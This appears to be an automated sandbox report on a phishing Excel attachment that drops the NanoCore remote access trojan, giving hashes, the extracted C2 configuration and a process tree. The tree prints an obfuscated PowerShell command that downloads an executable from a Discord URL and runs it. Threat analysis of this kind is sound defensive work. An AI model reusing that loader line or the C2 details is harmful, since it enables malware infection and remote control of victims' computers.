Analysis
- max time kernel: 77s
- max time network: 160s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 22-03-2021 17:39

Tasks:
- Static task: static1
- Behavioral task: behavioral1
  Sample: Purchase OrderDated19032021.xls
  Resource: win7v20201028
General
- Target: Purchase OrderDated19032021.xls
- Size: 81KB
- MD5: 1a49fe1a9c135ccd9c9f2d9cf395f378
- SHA1: 24d6ab599cef554a8e8e6b2e3abffb7072e6e1db
- SHA256: e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b
- SHA512: 9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3
Malware Config
Extracted
- https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe
Extracted
- Family: nanocore
- Version: 1.2.2.0
- C2: 185.140.53.130:2364, mydnsnanocore123.ddns.net:2364
- Mutex: af625c00-d1f5-4435-80be-9f676efc59dc

Attributes:
- activate_away_mode: true
- backup_connection_host: mydnsnanocore123.ddns.net
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2020-12-27T15:43:00.135192036Z
- bypass_user_account_control: true
- bypass_user_account_control_data: (empty)
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 2364
- default_group: 17-03-2021NANO
- enable_debug_mode: true
- gc_threshold: 1.048576e+07
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 1.048576e+07
- mutex: af625c00-d1f5-4435-80be-9f676efc59dc
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: 185.140.53.130
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: true
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1444 | 1280 | Powershell.exe
- Blocklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
  6 | 1444 | Powershell.exe
- Executes dropped EXE (1 IoC)
  Processes (pid | process):
  1192 | vjkEWrcAR.exe
- Drops file in System32 directory (1 IoC)
  Processes (description | ioc | process):
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes (description | pid | process | target process):
  PID 1192 set thread context of 344 | 1192 | vjkEWrcAR.exe | MSBuild.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Office loads VBA resources, possible macro or embedded object present
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 1 IoC)
  Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
- Modifies Internet Explorer settings
  Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | EXCEL.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | EXCEL.EXE
  Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | EXCEL.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | EXCEL.EXE
  Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | EXCEL.EXE
  Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt | EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid | process):
  1032 | EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes (pid | process):
  1444 | Powershell.exe (2 entries)
  344 | MSBuild.exe (6 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes (pid | process):
  344 | MSBuild.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 1444 | Powershell.exe
  Token: SeDebugPrivilege | 344 | MSBuild.exe
- Suspicious use of SetWindowsHookEx (3 IoCs)
  Processes (pid | process):
  1032 | EXCEL.EXE (3 entries)
- Suspicious use of WriteProcessMemory (17 IoCs)
  Processes (description | pid | process | target process):
  PID 1444 wrote to memory of 1192 | 1444 | Powershell.exe | vjkEWrcAR.exe (4 entries)
  PID 1192 wrote to memory of 1792 | 1192 | vjkEWrcAR.exe | schtasks.exe (4 entries)
  PID 1192 wrote to memory of 344 | 1192 | vjkEWrcAR.exe | MSBuild.exe (9 entries)
Processes (nested by depth in the process tree)
- [depth 1] C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
- [depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\SysWOW64\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmp"
      - Creates scheduled task(s)
    - [depth 3] C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
      Command line: "{path}"
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmp
  MD5: 6aa71ffda61bad08c679ff3105f3d54a
  SHA1: 9429dcabb7b4d43c5579a65bc51d6808fdb82e25
  SHA256: 16a2ab859f39767918b579699f12e6b2ec23a4ce561a59441492f47cfaac3285
  SHA512: b7479034dd68be51382a851ee3e238df4fd7a0bb982e85f98a76df881f08fc3147a0a9dc39be18a804f58457ffc88b784518507afdd23975c3c5a66fa6453304
- C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
  MD5: 894aea17779959eecac3bd54d66844a1
  SHA1: 29e6388dbf891443bbc5a1e503a539a2586e6868
  SHA256: 8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
  SHA512: bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964